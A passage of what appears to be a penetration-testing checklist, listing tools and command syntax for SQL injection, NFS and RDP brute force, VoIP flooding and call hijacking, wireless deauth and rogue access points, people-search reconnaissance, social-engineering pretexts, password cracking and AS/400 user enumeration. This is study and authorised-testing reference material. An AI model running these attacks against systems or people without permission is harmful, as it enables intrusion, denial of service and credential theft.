13.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k "NGS SOFTWARE" -gt SQUIRREL
13.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
13.22.2.4. Check Password
13.22.2.5. orabf
13.22.2.5.1. orabf [hash]:[username] [options]
13.22.2.6. thc-orakel
13.22.2.6.1. Cracker
13.22.2.6.2. Client
13.22.2.6.3. Crypto
13.22.2.7. DBVisualiser
13.22.2.7.1. SQL scripts from pentest.co.uk
13.22.2.7.2. Manual SQL input of previously reported vulnerabilities
13.22.3. Oracle Reference Material
13.22.3.1. Understanding SQL Injection
13.22.3.2. SQL Injection walkthrough
13.22.3.3. SQL Injection by example
13.22.3.4. Advanced SQL Injection in Oracle databases
13.22.3.5. Blind SQL Injection
13.22.3.6. SQL Cheatsheets
13.23. NFS Port 2049 open
13.23.1. NFS Enumeration
13.23.1.1. showmount -e hostname/ip_address
13.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
13.23.2. NFS Brute Force
13.23.2.1. Interact with NFS share and try to add/delete
13.23.2.2. Exploit and Confuse Unix
13.23.3. Examine Configuration Files
13.23.3.1. /etc/exports
13.23.3.2. /etc/lib/nfs/xtab
13.23.4. nmap nse script
13.23.4.1. nfs-showmount
13.24. Compaq/HP Insight Manager Port 2301, 2381 open
13.24.1. HP Enumeration
13.24.1.1. Authentication Method
13.24.1.1.1. Host OS Authentication
13.24.1.1.2. Default Authentication
13.24.1.2. Wikto
13.24.1.3. Nstealth
13.24.2. HP Bruteforce
13.24.2.1. Hydra
13.24.2.2. Acunetix
13.24.3. Examine Configuration Files
13.24.3.1. path.properties
13.24.3.2. mx.log
13.24.3.3. CLIClientConfig.cfg
13.24.3.4. database.props
13.24.3.5. pg_hba.conf
13.24.3.6. jboss-service.xml
13.24.3.7. .namazurc
13.25. MySQL port 3306 open
13.25.1. Enumeration
13.25.1.1. nmap -A -n -p3306 <IP Address>
13.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
13.25.1.3. telnet IP_Address 3306
13.25.1.4. use test; select * from test;
13.25.1.5. To check for other DB's -- show databases
13.25.2. Administration
13.25.2.1. MySQL Network Scanner
13.25.2.2. MySQL GUI Tools
13.25.2.3. mysqlshow
13.25.2.4. mysqlbinlog
13.25.3. Manual Checks
13.25.3.1. Default usernames and passwords
13.25.3.1.1. username: root password:
13.25.3.1.2. testing
13.25.3.2. Configuration Files
13.25.3.2.1. Operating System
13.25.3.2.2. Command History
13.25.3.2.3. Log Files
13.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
13.25.3.2.5. MySQL data directory (Location specified in my.cnf)
13.25.3.2.6. SSL Check
13.25.3.3. Privilege Escalation
13.25.3.3.1. Current Level of access
13.25.3.3.2. Access passwords
13.25.3.3.3. Create a new user and grant him privileges
13.25.3.3.4. Break into a shell
13.25.4. SQL injection
13.25.4.1. mysql-miner.pl
13.25.4.1.1. mysql-miner.pl http://target/ expected_string database
13.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
13.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
13.25.5. References.
13.25.5.1. Design Weaknesses
13.25.5.1.1. MySQL running as root
13.25.5.1.2. Exposed publicly on Internet
13.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
13.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
13.26. RDesktop port 3389 open
13.26.1. Rdesktop Enumeration
13.26.1.1. Remote Desktop Connection
13.26.2. Rdesktop Bruteforce
13.26.2.1. TSGrinder
13.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
13.26.2.2. Tscrack
13.27. Sybase Port 5000+ open
13.27.1. Sybase Enumeration
13.27.1.1. sybase-version ip_address from NGS
13.27.2. Sybase Vulnerability Assessment
13.27.2.1. Use DBVisualiser
13.27.2.1.1. Sybase Security checksheet
13.27.2.1.2. Manual SQL input of previously reported vulnerabilities
13.27.2.2. NGS Squirrel for Sybase
13.28. SIP Port 5060 open
13.28.1. SIP Enumeration
13.28.1.1. netcat
13.28.1.1.1. nc IP_Address Port
13.28.1.2. sipflanker
13.28.1.2.1. python sipflanker.py 192.168.1-254
13.28.1.3. Sipscan
13.28.1.4. smap
13.28.1.4.1. smap IP_Address/Subnet_Mask
13.28.1.4.2. smap -o IP_Address/Subnet_Mask
13.28.1.4.3. smap -l IP_Address
13.28.2. SIP Packet Crafting etc.
13.28.2.1. sipsak
13.28.2.1.1. Tracing paths: sipsak -T -s sip:username@domain
13.28.2.1.2. Options request: sipsak -vv -s sip:username@domain
13.28.2.1.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
13.28.2.2. siprogue
13.28.3. SIP Vulnerability Scanning/ Brute Force
13.28.3.1. tftp bruteforcer
13.28.3.1.1. Default dictionary file
13.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
13.28.3.2. VoIPaudit
13.28.3.3. SiVuS
13.28.4. Examine Configuration Files
13.28.4.1. SIPDefault.cnf
13.28.4.2. asterisk.conf
13.28.4.3. sip.conf
13.28.4.4. phone.conf
13.28.4.5. sip_notify.conf
13.28.4.6. <Ethernet address>.cfg
13.28.4.7. 000000000000.cfg
13.28.4.8. phone1.cfg
13.28.4.9. sip.cfg etc. etc.
13.29. VNC port 5900^ open
13.29.1. VNC Enumeration
13.29.1.1. Scans
13.29.1.1.1. 5900^ for direct access; 5800 for HTTP access.
13.29.2. VNC Brute Force
13.29.2.1. Password Attacks
13.29.2.1.1. Remote
13.29.2.1.2. Local
13.29.3. Examine Configuration Files
13.29.3.1. .vnc
13.29.3.2. /etc/vnc/config
13.29.3.3. $HOME/.vnc/config
13.29.3.4. /etc/sysconfig/vncservers
13.29.3.5. /etc/vnc.conf
13.30. Tor Port 9001, 9030 open
13.30.1. Tor Node Checker
13.30.1.1. Ip Pages
13.30.1.2. Kewlio.net
13.30.2. nmap NSE script
13.31. Jet Direct 9100 open
13.31.1. hijetta
14. VoIP Security
14.1. Sniffing Tools
14.1.1. AuthTool
14.1.2. Cain & Abel
14.1.3. Etherpeek
14.1.4. NetDude
14.1.5. Oreka
14.1.6. PSIPDump
14.1.7. SIPomatic
14.1.8. SIPv6 Analyzer
14.1.9. UCSniff
14.1.10. VoiPong
14.1.11. VOMIT
14.1.12. Wireshark
14.1.13. WIST - Web Interface for SIP Trace
14.2. Scanning and Enumeration Tools
14.2.1. enumIAX
14.2.2. fping
14.2.3. IAX Enumerator
14.2.4. iWar
14.2.5. Nessus
14.2.6. Nmap
14.2.7. SIP Forum Test Framework (SFTF)
14.2.8. SIPcrack
14.2.9. sipflanker
14.2.9.1. python sipflanker.py 192.168.1-254
14.2.10. SIP-Scan
14.2.11. SIP.Tastic
14.2.12. SIPVicious
14.2.13. SiVuS
14.2.14. SMAP
14.2.14.1. smap IP_Address/Subnet_Mask
14.2.14.2. smap -o IP_Address/Subnet_Mask
14.2.14.3. smap -l IP_Address
14.2.15. snmpwalk
14.2.16. VLANping
14.2.17. VoIPAudit
14.2.18. VoIP GHDB Entries
14.2.19. VoIP Voicemail Database
14.3. Packet Creation and Flooding Tools
14.3.1. H.323 Injection Files
14.3.2. H225regreject
14.3.3. IAXHangup
14.3.4. IAXAuthJack
14.3.5. IAX.Brute
14.3.6. IAXFlooder
14.3.6.1. ./iaxflood sourcename destinationname numpackets
14.3.7. INVITE Flooder
14.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
14.3.8. kphone-ddos
14.3.9. RTP Flooder
14.3.10. rtpbreak
14.3.11. Scapy
14.3.12. Seagull
14.3.13. SIPBomber
14.3.14. SIPNess
14.3.15. SIPp
14.3.16. SIPsak
14.3.16.1. Tracing paths: sipsak -T -s sip:username@domain
14.3.16.2. Options request: sipsak -vv -s sip:username@domain
14.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
14.3.17. SIP-Send-Fun
14.3.18. SIPVicious
14.3.19. Spitter
14.3.20. TFTP Brute Force
14.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
14.3.21. UDP Flooder
14.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
14.3.22. UDP Flooder (with VLAN Support)
14.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
14.3.23. Voiphopper
14.4. Fuzzing Tools
14.4.1. Asteroid
14.4.2. Codenomicon VoIP Fuzzers
14.4.3. Fuzzy Packet
14.4.4. Mu Security VoIP Fuzzing Platform
14.4.5. ohrwurm RTP Fuzzer
14.4.6. PROTOS H.323 Fuzzer
14.4.7. PROTOS SIP Fuzzer
14.4.8. SIP Forum Test Framework (SFTF)
14.4.9. Sip-Proxy
14.5. Signaling Manipulation Tools
14.5.1. AuthTool
14.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
14.5.2. BYE Teardown
14.5.3. Check Sync Phone Rebooter
14.5.4. RedirectPoison
14.5.5. Registration Adder
14.5.6. Registration Eraser
14.5.7. Registration Hijacker
14.5.8. SIP-Kill
14.5.9. SIP-Proxy-Kill
14.5.10. SIP-RedirectRTP
14.5.11. vnak
14.6. Media Manipulation Tools
14.6.1. RTP InsertSound
14.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
14.6.2. RTP MixSound
14.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
14.6.3. RTPProxy
14.6.4. RTPInject
14.7. Generic Software Suites
14.7.1. OAT Office Communication Server Tool Assessment
14.7.2. EnableSecurity VOIPPACK
14.7.2.1. Note: add-on for Immunity Canvas
14.8. References
14.8.1. URLs
14.8.1.1. Common Vulnerabilities and Exploits (CVE)
14.8.1.1.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
14.8.1.2. Default Passwords
14.8.1.3. Hacking Exposed VoIP
14.8.1.3.1. Tool Pre-requisites
14.8.1.4. VoIPsa
14.8.2. White Papers
14.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
14.8.2.2. An Analysis of VoIP Security Threats and Tools
14.8.2.3. Hacking VoIP Exposed
14.8.2.4. Security testing of SIP implementations
14.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
14.8.2.6. Two attacks against VoIP
14.8.2.7. VoIP Attacks!
14.8.2.8. VoIP Security Audit Program (VSAP)
14.8.3. Spirent ThreatEx
15. Wireless Penetration
15.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out a wireless assessment. All of it is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.
15.1.1. Site Map
15.1.1.1. RF Map
15.1.1.1.1. Lines of Sight
15.1.1.1.2. Signal Coverage
15.1.1.2. Physical Map
15.1.1.2.1. Triangulate APs
15.1.1.2.2. Satellite Imagery
15.1.2. Network Map
15.1.2.1. MAC Filter
15.1.2.1.1. Authorised MAC Addresses
15.1.2.1.2. Reaction to Spoofed MAC Addresses
15.1.2.2. Encryption Keys utilised
15.1.2.2.1. WEP
15.1.2.2.2. WPA/PSK
15.1.2.2.3. 802.1x
15.1.2.3. Access Points
15.1.2.3.1. ESSID
15.1.2.3.2. BSSIDs
15.1.2.4. Wireless Clients
15.1.2.4.1. MAC Addresses
15.1.2.4.2. Intercepted Traffic
15.2. SipRogue
15.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
15.4. Wireless Toolkit
15.4.1. Wireless Discovery
15.4.1.1. Aerosol
15.4.1.2. Airfart
15.4.1.3. Aphopper
15.4.1.4. Apradar
15.4.1.5. BAFFLE
15.4.1.6. inSSIDer
15.4.1.7. iWEPPro
15.4.1.8. karma
15.4.1.9. KisMAC-ng
15.4.1.10. Kismet
15.4.1.11. MiniStumbler
15.4.1.12. Netstumbler
15.4.1.13. Vistumbler
15.4.1.14. Wellenreiter
15.4.1.15. Wifi Hopper
15.4.1.16. WirelessMon
15.4.1.17. WiFiFoFum
15.4.2. Packet Capture
15.4.2.1. Airopeek
15.4.2.2. Airpcap
15.4.2.3. Airtraf
15.4.2.4. Apsniff
15.4.2.5. Cain
15.4.2.6. Commview
15.4.2.7. Ettercap
15.4.2.8. Netmon
15.4.2.8.1. nmwifi
15.4.2.9. Wireshark
15.4.3. EAP Attack tools
15.4.3.1. eapmd5pass
15.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
15.4.3.1.2. Untitled
15.4.4. Leap Attack Tools
15.4.4.1. asleap
15.4.4.2. thc leap cracker
15.4.4.3. anwrap
15.4.5. WEP/ WPA Password Attack Tools
15.4.5.1. Airbase
15.4.5.2. Aircrack-ptw
15.4.5.3. Aircrack-ng
15.4.5.4. Airsnort
15.4.5.5. cowpatty
15.4.5.6. FiOS Wireless Key Calculator
15.4.5.7. iWifiHack
15.4.5.8. KisMAC-ng
15.4.5.9. Rainbow Tables
15.4.5.10. wep attack
15.4.5.11. wep crack
15.4.5.12. wzcook
15.4.6. Frame Generation Software
15.4.6.1. Airgobbler
15.4.6.2. airpwn
15.4.6.3. Airsnarf
15.4.6.4. Commview
15.4.6.5. fake ap
15.4.6.6. void 11
15.4.6.7. wifi tap
15.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
15.4.6.8. FreeRADIUS - Wireless Pwnage Edition
15.4.7. Mapping Software
15.4.7.1. Online Mapping
15.4.7.1.1. WIGLE
15.4.7.1.2. Skyhook
15.4.7.2. Tools
15.4.7.2.1. Knsgem
15.4.8. File Format Conversion Tools
15.4.8.1. ns1 recovery and conversion tool
15.4.8.2. warbable
15.4.8.3. warkizniz
15.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
15.4.8.4. ivstools
15.4.9. IDS Tools
15.4.9.1. WIDZ
15.4.9.2. War Scanner
15.4.9.3. Snort-Wireless
15.4.9.4. AirDefense
15.4.9.5. AirMagnet
15.5. WLAN discovery
15.5.1. Unencrypted WLAN
15.5.1.1. Visible SSID
15.5.1.1.1. Sniff for IP range
15.5.1.2. Hidden SSID
15.5.1.2.1. Deauth client
15.5.2. WEP encrypted WLAN
15.5.2.1. Visible SSID
15.5.2.1.1. WEPattack
15.5.2.2. Hidden SSID
15.5.2.2.1. Deauth client
15.5.3. WPA / WPA2 encrypted WLAN
15.5.3.1. Deauth client
15.5.3.1.1. Capture EAPOL handshake
15.5.4. LEAP encrypted WLAN
15.5.4.1. Deauth client
15.5.4.1.1. Break LEAP
15.5.5. 802.1x WLAN
15.5.5.1. Create Rogue Access Point
15.5.5.1.1. Airsnarf
15.5.5.1.2. fake ap
15.5.5.1.3. Hotspotter
15.5.5.1.4. Karma
15.5.5.1.5. Linux rogue AP
15.5.6. Resources
15.5.6.1. URLs
15.5.6.1.1. Wirelessdefence.org
15.5.6.1.2. Russix
15.5.6.1.3. Wardrive.net
15.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
15.5.6.2. White Papers
15.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
15.5.6.2.2. 802.11b Firmware-Level Attacks
15.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
15.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
15.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds
15.5.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
15.5.6.2.7. Active behavioral fingerprinting of wireless devices
15.5.6.3. Common Vulnerabilities and Exploits (CVE)
15.5.6.3.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
16. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
17. http://secunia.com/advisories/search/?search=citrix
18. Network Footprinting (Reconnaissance) The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms, active and passive. A passive approach is always the best starting point, as it would normally evade intrusion detection systems and other forms of protection afforded to the network. It usually involves discovering publicly available information by using a web browser, visiting newsgroups, etc. An active form is more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
18.1. Untitled
18.1.1. Authoritative Bodies
18.1.1.1. IANA - Internet Assigned Numbers Authority
18.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
18.1.1.3. NRO - Number Resource Organisation
18.1.1.4. RIR - Regional Internet Registry
18.1.1.4.1. AFRINIC - African Network Information Centre
18.1.1.4.2. APNIC - Asia Pacific Network Information Centre
18.1.1.4.3. ARIN - American Registry for Internet Numbers
18.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
18.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre
18.1.2. Websites
18.1.2.1. Central Ops
18.1.2.1.1. Domain Dossier
18.1.2.1.2. Email Dossier
18.1.2.2. DNS Stuff
18.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
18.1.2.3. Fixed Orbit
18.1.2.3.1. Autonomous System lookups and other online tools available.
18.1.2.4. Geektools
18.1.2.5. IP2Location
18.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
18.1.2.6. Kartoo
18.1.2.6.1. Metasearch engine that visually presents its results.
18.1.2.7. MyIPNeighbors.com
18.1.2.7.1. Excellent site that gives details of the domains sharing the IP queried, and conversely IP-to-DNS resolution
18.1.2.8. My-IP-Neighbors.com
18.1.2.8.1. Excellent site that can be used if the above is down
18.1.2.9. myipneighbors.net
18.1.2.10. Netcraft
18.1.2.10.1. Online search tool allowing queries for host information.
18.1.2.11. Passive DNS Replication
18.1.2.11.1. Finds shared domains based on supplied IP addresses
18.1.2.11.2. Note: website utilised by the nmap hostmap.nse script
18.1.2.12. Robtex
18.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
18.1.2.12.2. Note: can be unreliable with old entries (use CentralOps to verify)
18.1.2.13. Traceroute.org
18.1.2.13.1. Website listing a large number of links to online traceroute resources.
18.1.2.14. Wayback Machine
18.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
18.1.2.15. Whois.net
18.1.3. Tools
18.1.3.1. Cheops-ng
18.1.3.2. Country whois
18.1.3.3. Domain Research Tool
18.1.3.4. Firefox Plugins
18.1.3.4.1. AS Number
18.1.3.4.2. Shazou
18.1.3.4.3. Firecat Suite
18.1.3.5. Gnetutil
18.1.3.6. Goolag Scanner
18.1.3.7. Greenwich
18.1.3.8. Maltego
18.1.3.9. GTWhois
18.1.3.10. Sam Spade
18.1.3.11. Smart whois
18.1.3.12. SpiderFoot
18.2. Internet Search
18.2.1. General Information
18.2.1.1. Web Investigator
18.2.1.2. Tracesmart
18.2.1.3. Friends Reunited
18.2.1.4. Ebay - profiles etc.
18.2.2. Financial
18.2.2.1. EDGAR - Company information, including real-time filings. US
18.2.2.2. Google Finance - General Finance Portal
18.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
18.2.2.4. Companies House UK
18.2.2.5. Land Registry UK
18.2.3. Phone book/ Electoral Roll Information
18.2.3.1. 123people
18.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
18.2.3.2. 192.com
18.2.3.2.1. Electoral Roll Search. UK
18.2.3.3. 411
18.2.3.3.1. Online White Pages and Yellow Pages. US
18.2.3.4. Untitled
18.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
18.2.3.5. BT.com. UK
18.2.3.5.1. Residential
18.2.3.5.2. Business
18.2.3.6. Pipl
18.2.3.6.1. Untitled
18.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
18.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
18.2.3.7. Spokeo
18.2.3.7.1. http://www.spokeo.com/user?q=domain_name
18.2.3.7.2. http://www.spokeo.com/user?q=email_address
18.2.3.8. Yasni
18.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
18.2.3.9. Zabasearch
18.2.3.9.1. People Search Engine. US
18.2.4. Generic Web Searching
18.2.4.1. Code Search
18.2.4.2. Forum Entries
18.2.4.3. Google Hacking Database
18.2.4.4. Google
18.2.4.4.1. Email Addresses
18.2.4.4.2. Contact Details
18.2.4.5. Newsgroups/forums
18.2.4.6. Blog Search
18.2.4.6.1. Yammer
18.2.4.6.2. Google Blog Search
18.2.4.6.3. Technorati
18.2.4.6.4. Jaiku
18.2.4.6.5. Present.ly
18.2.4.6.6. Twitter Network Browser
18.2.4.7. Search Engine Comparison/ Aggregator Sites
18.2.4.7.1. Clusty
18.2.4.7.2. Grokker
18.2.4.7.3. Zuula
18.2.4.7.4. Exalead
18.2.4.7.5. Delicious
18.2.5. Metadata Search
18.2.5.1. Untitled
18.2.5.1.1. MetaData Visualisation Sites
18.2.5.1.2. Tools
18.2.5.1.3. Wikipedia Metadata Search
18.2.6. Social/ Business Networks
18.2.6.1. Untitled
18.2.6.1.1. Africa
18.2.6.1.2. Australia
18.2.6.1.3. Belgium
18.2.6.1.4. Holland
18.2.6.1.5. Hungary
18.2.6.1.6. Iran
18.2.6.1.7. Japan
18.2.6.1.8. Korea
18.2.6.1.9. Poland
18.2.6.1.10. Russia
18.2.6.1.11. Sweden
18.2.6.1.12. UK
18.2.6.1.13. US
18.2.6.1.14. Assorted
18.2.7. Resources
18.2.7.1. OSINT
18.2.7.2. International Directory of Search Engines
18.3. DNS Record Retrieval from publicly available servers
18.3.1. Types of Information Records
18.3.1.1. SOA Records - Indicates the server that has authority for the domain.
18.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
18.3.1.3. NS Records - List of a host’s or domain’s name server(s).
18.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
18.3.1.5. PTR Records - Maps an IP address back to a host's domain name (reverse lookup).
18.3.1.6. SRV Records - Service location record.
18.3.1.7. HINFO Records - Host information record with CPU type and operating system.
18.3.1.8. TXT Records - Generic text record.
18.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
18.3.1.10. RP - Responsible person for the domain.
18.3.2. Database Settings
18.3.2.1. Version.bind
18.3.2.2. Serial
18.3.2.3. Refresh
18.3.2.4. Retry
18.3.2.5. Expiry
18.3.2.6. Minimum
18.3.3. Sub Domains
18.3.4. Internal IP ranges
18.3.4.1. Reverse DNS for IP Range
18.3.5. Zone Transfer
18.4. Social Engineering
18.4.1. Remote
18.4.1.1. Phone
18.4.1.1.1. Scenarios
18.4.1.1.2. Results
18.4.1.1.3. Contact Details
18.4.1.2. Email
18.4.1.2.1. Scenarios
18.4.1.2.2. Software
18.4.1.2.3. Results
18.4.1.2.4. Contact Details
18.4.1.3. Other
18.4.2. Local
18.4.2.1. Personas
18.4.2.1.1. Name
18.4.2.1.2. Phone
18.4.2.1.3. Email
18.4.2.1.4. Business Cards
18.4.2.2. Contact Details
18.4.2.2.1. Name
18.4.2.2.2. Phone number
18.4.2.2.3. Email
18.4.2.2.4. Room number
18.4.2.2.5. Department
18.4.2.2.6. Role
18.4.2.3. Scenarios
18.4.2.3.1. New IT employee
18.4.2.3.2. Fire Inspector
18.4.2.4. Results
18.4.2.5. Maps
18.4.2.5.1. Satellite Imagery
18.4.2.5.2. Building layouts
18.4.2.6. Other
18.5. Dumpster Diving
18.5.1. Rubbish Bins
18.5.2. Contract Waste Removal
18.5.3. eBay ex-stock sales, e.g. HDDs
18.6. Web Site copy
18.6.1. HTTrack
18.6.2. teleport pro
18.6.3. Black Widow
19. Password cracking
19.1. Rainbow crack
19.1.1. ophcrack
19.1.2. rainbow tables
19.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
19.2. Ophcrack
19.3. Cain & Abel
19.4. John the Ripper
19.4.1. ./unshadow passwd shadow > file_to_crack
19.4.2. ./john -single file_to_crack
19.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
19.4.4. ./john -show file_to_crack
19.4.5. ./john --incremental:All file_to_crack
19.5. fgdump
19.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} e.g. fgdump.exe -u hacker -p hard_password -c -f target.txt
19.6. pwdump6
19.7. medusa
19.8. LCP
19.9. L0phtcrack (Note: this tool was acquired by Symantec from @Stake and it is their policy not to ship it outside the USA and Canada)
19.9.1. Domain credentials
19.9.2. Sniffing
19.9.3. pwdump import
19.9.4. sam import
19.10. aiocracker
19.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
20. Vulnerability Assessment - Using vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine whether there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of the tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared against any Common Vulnerabilities and Exposures (CVE) that have been released, and matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, e.g. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
20.1. Manual
20.1.1. Patch Levels
20.1.2. Confirmed Vulnerabilities
20.1.2.1. Severe
20.1.2.2. High
20.1.2.3. Medium
20.1.2.4. Low
20.2. Automated
20.2.1. Reports
20.2.2. Vulnerabilities
20.2.2.1. Severe
20.2.2.2. High
20.2.2.3. Medium
20.2.2.4. Low
20.3. Tools
20.3.1. GFI
20.3.2. Nessus (Linux)
20.3.2.1. Nessus (Windows)
20.3.3. NGS Typhon
20.3.4. NGS Squirrel for Oracle
20.3.5. NGS Squirrel for SQL
20.3.6. SARA
20.3.7. MatriXay
20.3.8. BiDiBlah
20.3.9. SSA
20.3.10. Oval Interpreter
20.3.11. Xscan
20.3.12. Security Manager +
20.3.13. Inguma
20.4. Resources
20.4.1. Security Focus
20.4.2. Microsoft Security Bulletin
20.4.3. Common Vulnerabilities and Exploits (CVE)
20.4.4. National Vulnerability Database (NVD)
20.4.5. The Open Source Vulnerability Database (OSVDB)
20.4.5.1. Standalone Database
20.4.5.1.1. Update URL
20.4.6. United States Computer Emergency Response Team (US-CERT)
20.4.7. Computer Emergency Response Team
20.4.8. Mozilla Security Information
20.4.9. SANS
20.4.10. Securiteam
20.4.11. PacketStorm Security
20.4.12. Security Tracker
20.4.13. Secunia
20.4.14. Vulnerabilities.org
20.4.15. ntbugtraq
20.4.16. Wireless Vulnerabilities and Exploits (WVE)
20.5. Blogs
20.5.1. Carnal0wnage
20.5.2. Fsecure Blog
20.5.3. g0ne blog
20.5.4. GNUCitizen
20.5.5. ha.ckers Blog
20.5.6. Jeremiah Grossman Blog
20.5.7. Metasploit
20.5.8. nCircle Blogs
20.5.9. pentest mokney.net
20.5.10. Rational Security
20.5.11. Rise Security
20.5.12. Security Fix Blog
20.5.13. Software Vulnerability Exploitation Blog
20.5.14. Taosecurity Blog
21. AS/400 Auditing
21.1. Remote
21.1.1. Information Gathering
21.1.1.1. Nmap using common iSeries (AS/400) services.
21.1.1.1.1. Unsecured services (Port;name;description)
21.1.1.1.2. Secured services (Port;name;description)
21.1.1.2. NetCat (old school technique)
21.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
21.1.1.3. Banners Grabbing
21.1.1.3.1. Telnet
21.1.1.3.2. FTP
21.1.1.3.3. HTTP Banner
21.1.1.3.4. POP3
21.1.1.3.5. SNMP
21.1.1.3.6. SMTP
21.1.2. Users Enumeration
21.1.2.1. Default AS/400 user accounts
21.1.2.2. Error messages
21.1.2.2.1. Telnet Login errors
21.1.2.2.2. POP3 authentication Errors
21.1.2.3. Qsys symbolic link (if ftp is enabled)
21.1.2.3.1. ftp target | quote stat | quote site namefmt 1
21.1.2.3.2. cd /
21.1.2.3.3. quote site listfmt 1
21.1.2.3.4. mkdir temp
21.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
21.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
21.1.2.3.7. dir /temp/qsys/*.usrprf
21.1.2.4. LDAP
21.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
21.1.2.4.2. Tool to browse LDAP
21.1.3. Exploitation
21.1.3.1. CVE References
21.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
21.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
21.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
21.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
21.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
21.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
21.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
21.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
21.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
21.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
21.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
21.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
21.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
